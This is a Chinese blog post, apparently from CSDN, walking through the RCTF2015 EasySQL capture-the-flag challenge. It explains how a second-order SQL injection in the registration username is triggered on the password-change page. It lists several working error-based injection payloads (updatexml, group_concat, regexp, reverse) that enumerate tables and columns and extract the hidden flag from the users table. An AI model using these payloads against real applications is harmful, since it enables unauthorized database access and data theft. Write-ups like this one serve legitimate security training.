[RCTF2015]EasySQL

最新推荐文章于 2024-07-27 15:40:59 发布
最新推荐文章于 2024-07-27 15:40:59 发布
阅读量175 收藏
点赞数
分类专栏: # ctf做题记录 sql注入 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/115368964
版权

在这里插入图片描述
有登录界面和注册界面,先注册。
在这里插入图片描述
注册后登录
在这里插入图片描述
在这里插入图片描述
有修改密码的界面。
在这里插入图片描述
报错了,确认存在二次注入。
payload

username=fmyyy2"||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1))#
username=fmyyy"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),0x7e),1))#
username=fmyyy"||(updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)),0x7e),1))#

flag表里的flag是假的,真flag在users里。
在这里插入图片描述
但真flag字段里列名太多,无法查到flag。
参考
https://blog.csdn.net/mochu7777777/article/details/105179021
可以用正则匹配
payload:

username=fmyyy"||(updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),0x7e),1))#
username=fmyyy"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#

在这里插入图片描述
在这里插入图片描述
第二个结果用脚本翻转一下就好了。

fmyyy1
关注
专栏目录
[wp][RCTF2015]EasySQL
小飒的博客
07-05 458
有修改密码怀疑是2次注入 admin被注册 sqli-lab24关中遇到过二次注入 特地去看了下代码 一开始尝试admin’# 修改密码 admin还是登陆不上 使用admin"# 修改密码后,可以使用admin登陆上,但是没任何变化 试下报错注入 注册的时候发现有过滤 得到数据库名:web_sqli 得到表名article,flag,users 盲猜列名 flag 获得"~RCTF{Good job! But flag not her"疯了,只能试下别的表,希望不要是被我修改了的admin密码 real_
[初级]sql注入之二次注入[RCTF2015]EasySQL 1(报错注入,爆库,表)
BlingZeng的博客
02-09 3829
BUUCTF的[RCTF2015]EasySQL1 题目的解题文章,如果有兴趣可以一起探讨一下。使用的方法是二次注入,报错注入,爆库、表等手段
[RCTF2015]EasySQL 1
最新发布
ubaichu的博客
07-27 598
[RCTF2015]EasySQL 1 题目解析
190409 逆向-RCTF2015(FlagSystem)
热门推荐
whklhhhh的博客
04-09 2万+
想起来前段时间搞了JEB3的泄露版,找了个安卓题来试试手 结果发现这题目也挺有意思的23333 提供的题目文件是一个二进制,十六进制查看器发现头部标着ANDROID BACKUP,显然就是个应用的备份文件了 查了一下可以通过abe.jar来解包,试了一下发现解出来的文件是乱码,毫无标志 于是找了一下文件解析,发现第三行为压缩标志位,源文件为0表示未压缩,于是将它改成1,再次解包,得到两个应用 看...
RCTF_2015_web500.rar
09-30
【标题】"RCTF_2015_web500.rar" 指的可能是一个在2015年RCTF(Redbud Cybersecurity Technology Challenge)网络安全竞赛中的Web类题目,难度级别可能是500分,暗示这道题目相对复杂。这种竞赛通常涉及网络安全、...
XCTF攻防世界题目upload(RCTF-2015)
daqiangdetianxia的博客
08-12 714
upload 信息搜集 dirsearch目录扫描,发现classes目录 然后进入classes目录,发现password.php user.php文件夹 中间件和服务器:Apache/2.4.7 (Ubuntu) 尝试 用sqlmap对登录和注册页面进行注入,发现不行。 注册后进行登录,发现有一个文件上传页面。可能是一个文件上传漏洞。 上传一句话木马,找不到上传后的文件夹,于是通过猜测上传文件夹名称,找不到,于是放弃文件上传漏洞。 文件上传后发现 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值